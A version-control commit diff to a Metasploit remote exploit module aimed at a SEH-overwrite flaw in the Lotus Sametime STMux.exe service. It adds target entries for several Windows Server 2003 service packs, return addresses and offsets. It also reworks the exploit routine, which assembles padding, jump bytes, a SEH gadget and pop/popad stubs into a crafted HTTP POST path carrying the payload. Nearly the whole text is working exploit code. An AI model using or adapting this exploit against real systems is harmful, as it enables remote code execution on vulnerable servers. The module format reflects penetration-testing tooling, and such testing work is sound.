Updated with changes from raif.

git-svn-id: file:///home/svn/framework3/trunk@6080 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Patrick Webster 2009-01-07 00:15:55 +00:00
parent 60634b4d87
commit 204ebd411f
1 changed files with 19 additions and 12 deletions

View File

@ -25,7 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote
STMux.exe service we are able to overwrite SEH. Based on the exploit STMux.exe service we are able to overwrite SEH. Based on the exploit
by Manuel Santamarina Suarez. by Manuel Santamarina Suarez.
}, },
'Author' => 'patrick', 'Author' => [ 'patrick', 'riaf <riaf@mysec.org>' ],
'Arch' => [ ARCH_X86 ], 'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Version' => '$Revision$', 'Version' => '$Revision$',
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Privileged' => true, 'Privileged' => true,
'DefaultOptions' => 'DefaultOptions' =>
{ {
'EXITFUNC' => 'process', 'EXITFUNC' => 'seh',
}, },
'Payload' => 'Payload' =>
{ {
@ -51,10 +51,13 @@ class Metasploit3 < Msf::Exploit::Remote
'Targets' => 'Targets' =>
[ [
# Patrick - Tested OK against Windows 2003 SP1 20081114 # Patrick - Tested OK against Windows 2003 SP1 20081114
[ 'Lotus Sametime 7.5 on Windows Server 2000', { 'Ret' => 0x7c3410c2, 'Offset' => 268 } ], # pop ecx, pop exc, ret msvcr71.dll [ 'Lotus Sametime 7.5 on Windows Server 2000 SP4', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 268 ] }], # pop ecx, pop exc, ret msvcr71.dll
[ 'Lotus Sametime 7.5 on Windows Server 2003', { 'Ret' => 0x7c3410c2, 'Offset' => 269 } ], # pop ecx, pop exc, ret msvcr71.dll [ 'Lotus Sametime 7.5 on Windows Server 2003 SP1', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 269 ] }], # pop ecx, pop exc, ret msvcr71.dll
[ 'Lotus Sametime 7.5 on Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }],
[ 'Lotus Sametime 7.5.1 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 5, 269 ] }],
[ 'Lotus Sametime 8.0.0 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }],
], ],
'DisclosureDate' => 'Dec 27 2004', # 'DisclosureDate' => 'May 21 2008',
'DefaultTarget' => 1)) 'DefaultTarget' => 1))
register_options( register_options(
@ -96,18 +99,22 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
connect connect
# Patrick - We should use Metasm here. pad1 = rand_text_alpha_lower(44)
#popebx = Metasm::Shellcode.assemble(Metasm::Ia32.new, "pop ebx").encode_string * 3 pad2 = rand_text_alpha_lower(29)
#popad = Metasm::Shellcode.assemble(Metasm::Ia32.new, "popad").encode_string * target['Offset']
popad = "\x5b" * 3 + "\x61" * target['Offset'] + "\xff\x24\x24" # pop ebx, popad jmp, dword ptr ss:[esp] # Patrick - We should use Metasm here.
popebx = Metasm::Shellcode.assemble(Metasm::Ia32.new, "pop ebx").encode_string * target['Offset'][0]
popad = Metasm::Shellcode.assemble(Metasm::Ia32.new, "popad").encode_string * target['Offset'][1]
esp = "\xff\x24\x24" # dword ptr ss:[esp]
jmp = "\x74\x23" + "\x75\x21" # je short, jnz short jmp = "\x74\x23" + "\x75\x21" # je short, jnz short
path = "\x66" * 44 + jmp + [target['Ret']].pack('V') + "\x66" * 29 + popad seh = [target['Ret']].pack('V')
path = pad1 + jmp + seh + pad2 + popebx + popad + esp
req = "POST /CommunityCBR/CC.39.#{path}/\r\n" req = "POST /CommunityCBR/CC.39.#{path}/\r\n"
req << "User-Agent: Sametime Community Agent\r\n" req << "User-Agent: Sametime Community Agent\r\n"
req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n" req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
req << "Content-Length: #{payload.encoded.length}\r\n" req << "Content-Length: #{payload.encoded.length.to_s}\r\n"
req << "Connection: Close\r\n" req << "Connection: Close\r\n"
req << "Cache-Control: no-cache\r\n\r\n" req << "Cache-Control: no-cache\r\n\r\n"
req << payload.encoded req << payload.encoded